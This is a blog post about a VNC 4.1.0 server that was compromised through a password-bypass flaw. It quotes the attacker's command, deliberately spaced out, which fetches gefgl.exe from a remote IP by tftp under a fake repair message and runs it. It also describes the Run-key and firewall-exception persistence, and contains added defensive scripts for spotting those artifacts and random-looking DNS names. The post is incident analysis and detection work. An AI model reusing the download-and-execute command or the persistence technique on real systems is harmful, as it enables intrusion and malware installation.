VNC + Server Mode + Version 4.1.0 = Spanked
I set up VNC today so I could access my email, and not 15 minutes afterwards I saw my mouse start moving and a DOS window pop up.
I yanked my network cable, and then shut down my modem. This is what I found (I've added spaces to make sure it's not accidentally executed):
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 83.21 7.113.2 07 GET gefgl.exe & start gefgl&
Found gefgl in my Windows\system32... a nice file called a.exe, iaxcfg32.dll, and a Run entry in the registry linked to a.exe called MSMSGR... hell, it even added itself to the list of allowed programs in Windows Firewall, as you can see here:
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List :*:Enabled:WADPXA32
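The two registry artifacts above (a Run entry pointing at a.exe, and a firewall exception for the same binary under the unrelated name WADPXA32) are exactly the kind of pair a cleanup script should correlate. The following is an added example, not code from the original post: it parses the XP SP2 AuthorizedApplications value format (path:scope:Enabled:name) and reports autostart images that also hold a firewall exception open to any remote address or carry a display name that does not match the executable. The sample dictionaries are constructed; the path of the a.exe firewall entry is an assumption, since the post only shows the tail of that value.

```python
import ntpath
import re

# Constructed sample data, not exported from the author's machine.  Under
# ...\FirewallPolicy\StandardProfile\AuthorizedApplications\List each value
# name is an executable path and each value's data has the form
#   <path>:<remote scope>:<Enabled|Disabled>:<display name>
# The full path of the a.exe entry is an assumption; the post shows only its tail.
FIREWALL_LIST = {
    r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe":
        r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe:*:Enabled:Mozilla Thunderbird",
    r"C:\WINDOWS\system32\a.exe":
        r"C:\WINDOWS\system32\a.exe:*:Enabled:WADPXA32",
}

# Constructed sample of HKLM\...\CurrentVersion\Run (value name -> image path).
RUN_KEY = {
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    "MSMSGR": r"C:\WINDOWS\system32\a.exe",
}


def parse_firewall_entry(data):
    """Split one AuthorizedApplications value into its four fields.
    rsplit from the right keeps the drive-letter colon inside the path."""
    path, scope, state, name = data.rsplit(":", 3)
    return {"path": path, "scope": scope, "state": state, "name": name}


def stem(path):
    """Lower-cased file name without extension: 'a' for ...\\a.exe."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def name_matches(stem_, display_name):
    """True when the display name plausibly refers to the executable."""
    words = re.findall(r"[a-z0-9]+", display_name.lower())
    if stem_ in words:
        return True
    # Only accept substring matches for stems long enough to be meaningful.
    return len(stem_) >= 3 and stem_ in "".join(words)


def audit(firewall_list, run_key):
    """Return (Run value name, image path, reasons) for autostart entries that look off."""
    fw_by_path = {}
    for data in firewall_list.values():
        entry = parse_firewall_entry(data)
        fw_by_path[entry["path"].lower()] = entry

    findings = []
    for value_name, image in run_key.items():
        reasons = []
        if len(stem(image)) <= 2:
            reasons.append("image has a one- or two-character file name")
        fw = fw_by_path.get(image.lower())
        if fw is not None:
            if fw["state"] == "Enabled" and fw["scope"] == "*":
                reasons.append("autostart image also has a firewall exception open to any remote address")
            if not name_matches(stem(fw["path"]), fw["name"]):
                reasons.append("firewall display name %r does not match the executable" % fw["name"])
        if reasons:
            findings.append((value_name, image, reasons))
    return findings


if __name__ == "__main__":
    for value_name, image, reasons in audit(FIREWALL_LIST, RUN_KEY):
        print(f"{value_name} -> {image}")
        for reason in reasons:
            print("   ", reason)
```

On a live machine the two dictionaries would come from winreg reads of the Run key and the AuthorizedApplications list; the heuristics stay the same. Thunderbird is in the firewall list but not autostarted, so it produces no finding, while the MSMSGR entry trips all three checks.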
Here's a link to a good breakdown. I saw the same kind of output in Ethereal that she saw. My Ethereal captures; shortly thereafter I renamed all the exe files and deleted the registry bits....
No. Time Source Destination Protocol Info
8 7.188722 192.168.254.100 192.168.254.254 DNS Standard query A pdfrvgteqe.ecbebpbswppnlhivbogg.com
Frame 8 (95 bytes on wire, 95 bytes captured)
Ethernet II, Src: Intel_02:9b:1c (00:11:11:02:9b:1c), Dst: 192.168.254.254 (00:a0:65:c8:01:28)
Internet Protocol, Src: 192.168.254.100 (192.168.254.100), Dst: 192.168.254.254 (192.168.254.254)
User Datagram Protocol, Src Port: 1047 (1047), Dst Port: domain (53)
Domain Name System (query)
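The query name in that capture, pdfrvgteqe.ecbebpbswppnlhivbogg.com, is the giveaway: long labels with almost no vowels and consonant runs no real word has. Here is an added example (not part of the original post) of a small check that reads Ethereal/Wireshark summary lines in the format shown above and flags such names. Only the first sample line is taken from the capture; the other lines are constructed benign traffic, and the thresholds (label length of 8 or more, vowel ratio under 0.3, a consonant run of 5 or more) are my own choices.

```python
import math
import re

# Constructed sample in the Ethereal summary-line format
# (No. Time Source Destination Protocol Info).  Line 8 is the query from the
# capture above; the remaining lines are invented benign queries.
SAMPLE_LINES = """\
8 7.188722 192.168.254.100 192.168.254.254 DNS Standard query A pdfrvgteqe.ecbebpbswppnlhivbogg.com
9 7.201133 192.168.254.100 192.168.254.254 DNS Standard query A mail.example.com
10 7.455020 192.168.254.100 192.168.254.254 DNS Standard query A www.windowsupdate.com
11 8.010442 192.168.254.100 192.168.254.254 DNS Standard query A time.windows.com
"""

# Newer Wireshark builds put a transaction id (0x1234) before the record type;
# the optional group accepts both forms.
QUERY_RE = re.compile(
    r"^\d+\s+[\d.]+\s+(\S+)\s+(\S+)\s+DNS\s+Standard query (?:0x[0-9a-f]+ )?\w+ (\S+)"
)
VOWELS = set("aeiou")


def shannon_entropy(s):
    """Bits per character; a 20-letter random string scores around 3.5 or higher."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_consonant_run(label):
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def vowel_ratio(label):
    letters = [c for c in label if c.isalpha()]
    return sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0


def suspicious_labels(name):
    """Return the labels of a query name that look machine-generated.
    The top-level domain is skipped; thresholds are assumptions, not a standard."""
    labels = name.lower().rstrip(".").split(".")[:-1]
    return [
        label for label in labels
        if len(label) >= 8
        and vowel_ratio(label) < 0.3
        and longest_consonant_run(label) >= 5
    ]


def scan(lines):
    """Parse summary lines and report queries with suspicious labels."""
    hits = []
    for line in lines.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue
        src, dst, name = m.groups()
        bad = suspicious_labels(name)
        if bad:
            hits.append({
                "src": src,
                "name": name,
                "labels": bad,
                "entropy": round(max(shannon_entropy(l) for l in bad), 2),
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"{hit['src']} queried {hit['name']} (labels {hit['labels']}, entropy {hit['entropy']})")
```

Entropy alone is a weak signal, since long legitimate host names score almost as high; combining it with the vowel ratio and the consonant-run length is what keeps windowsupdate.com out of the report while both labels of the captured query land in it.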
It seems that there's an exploit in the 4.1.0 release that allowed authentication without a password, and somebody out there is obviously watching for it. Even so, I'm surprised at how fast they caught me.
Comments
Give UltraVNC a try. I find it a better solution for VNC.
If you have SSH access from work, set up some nice port-forwarding sessions for Remote Desktop Connection and drop VNC completely. Works wunderbar!
Posted by: Eric | July 23, 2007 08:18 AM
Thanks for the compliment! I'm a "she" though...
Posted by: endellion | July 24, 2007 06:03 AM
It was really helpful in tracking down what happened; I'll fix the "she" part.
Posted by: Dennis Judd | July 24, 2007 08:54 AM
Appreciated!
Posted by: endellion | August 2, 2007 06:33 PM